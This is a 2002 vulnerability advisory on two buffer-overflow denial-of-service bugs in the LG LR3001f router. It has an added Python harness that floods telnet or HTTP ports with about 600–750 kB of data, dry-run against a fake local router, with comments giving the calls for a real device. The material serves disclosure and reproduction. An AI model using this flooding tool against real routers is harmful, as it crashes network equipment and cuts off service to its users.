Issue: ----------------------------------------------------------------|
The LG Electronics LR3001f is a WAN router. It ships with no access
lists defined, which allows an administrator (and anyone else who can
reach the router) to connect to both port 23/tcp (telnet) and port
80/tcp (the web server). However, the IP stack of the LR3001f has
several bugs that can be exploited over the network.
Description: ----------------------------------------------------------|
When configured without access lists protecting port 23 and/or port
80, the LR3001f is vulnerable to at least two bugs, both resulting
from buffer overflows in its memory allocation functions.
The first is exploitable without any user account on the router; the
only thing needed is network access to port 23/tcp or 80/tcp. If the
router is sent a data stream (any characters will do; both randomized
and text-only input was used during testing) on one of the mentioned
ports, it reboots with one of the following messages:
Router# [BUFFER] Unknown free 0xffffffff
Router# can't malloc
or
Router# [BUFFER] ERROR free not in use
Router# can't malloc
The measured lengths of the data stream needed to trigger the reboot
were approx. 750 kB for 23/tcp and 600 kB for 80/tcp.
The second bug is in the telnet service itself, in the password
check. The same technique with a random data stream is used, but a
few ENTER characters must be sent first to get past the router's
initial prompt, which waits for that key to be pressed. In this case
the router reboots with no message.
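The two conditions above, as an added reproduction harness written for this page (it is not the advisory author's tool). It streams a given number of bytes at a port, optionally after a preamble of ENTERs for the telnet password-check bug, and reports whether the peer dropped the connection before the whole stream was accepted, which is what a rebooting router looks like from the client side. The stream sizes are the approximate values measured in the advisory; the number of ENTERs (three), the chunk size and the timeout are assumptions, and the fake router used for the offline dry run is a constructed stand-in that simply closes the connection after a threshold of bytes.

```python
# Added example for this page, not the advisory author's code.
import os
import socket
import threading

TELNET_PORT = 23
HTTP_PORT = 80

# Approximate data-stream lengths the advisory reports for the first bug.
STREAM_BYTES = {TELNET_PORT: 750 * 1024, HTTP_PORT: 600 * 1024}

# Preamble for the second (telnet password-check) bug: a few ENTERs to get
# past the initial prompt before the random stream. Three is an assumption;
# the advisory only says "a few".
TELNET_PREAMBLE = b"\r\n" * 3


def payload(length, text_only=False):
    """Build the data stream. The advisory says random and text-only
    input both trigger the reboot, so either can be generated."""
    if text_only:
        pattern = b"A" * 64 + b"\r\n"
        return (pattern * (length // len(pattern) + 1))[:length]
    return os.urandom(length)


def flood(host, port, total, preamble=b"", chunk=4096, text_only=False,
          timeout=10.0):
    """Connect to host:port, send the optional preamble, then stream `total`
    bytes in `chunk`-sized writes. Returns (bytes_accepted, dropped):
    dropped is True when the peer reset or closed the connection (or stopped
    reading) before the whole stream was accepted, which is the observable
    symptom of the reboot described in the advisory."""
    sent = 0
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            if preamble:
                s.sendall(preamble)
            while sent < total:
                n = min(chunk, total - sent)
                s.sendall(payload(n, text_only))
                sent += n
        except OSError:
            # ECONNRESET / EPIPE / timeout: the router is gone.
            return sent, True
    return sent, False


def start_fake_router(threshold):
    """Constructed stand-in for a vulnerable router, used only to exercise
    the harness offline. Accepts one connection on 127.0.0.1, reads
    `threshold` bytes (preamble included) and then closes, like a device
    that reboots part way through the stream. Returns the listening port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        seen = 0
        while seen < threshold:
            data = conn.recv(65536)
            if not data:
                break
            seen += len(data)
        conn.close()  # unread data is still queued, so the peer gets a reset
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


if __name__ == "__main__":
    # Dry run against the fake router. Against a real LR3001f the calls
    # would be flood(router_ip, TELNET_PORT, STREAM_BYTES[TELNET_PORT]) for
    # the first bug and flood(router_ip, TELNET_PORT,
    # STREAM_BYTES[TELNET_PORT], TELNET_PREAMBLE) for the second.
    port = start_fake_router(threshold=64 * 1024)
    print(flood("127.0.0.1", port, 32 * 1024 * 1024))
```

The harness deliberately counts only whole chunks that the kernel accepted, so the reported byte count is a lower bound on what reached the router; against a real device the interesting number is how far short of the advisory's 750 kB / 600 kB the connection dies, not the exact figure.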
Vulnerable versions: --------------------------------------------------|
All software versions up to and including 4.0 are vulnerable to both
types of attack.
Version 4.57, downloadable from the vendor website, is vulnerable to
the second type of attack but not to the first.
The vendor representative was informed of the vulnerabilities on
2002-04-18; as of that date LG had not released any new software
version.
Info on this advisory: ------------------------------------------------|
This advisory can be accessed on-line at my personal site:
http://mr0vka.eu.org/docs/advisories/lg-3100f-2002-04-18.html
or in plain-text:
http://mr0vka.eu.org/docs/advisories/lg-3100f-2002-04-18.txt
My personal GPG key fingerprint is located at the following address:
http://mr0vka.eu.org/aboutme/index.html#pgp
Disclaimer: -----------------------------------------------------------|
None at this time.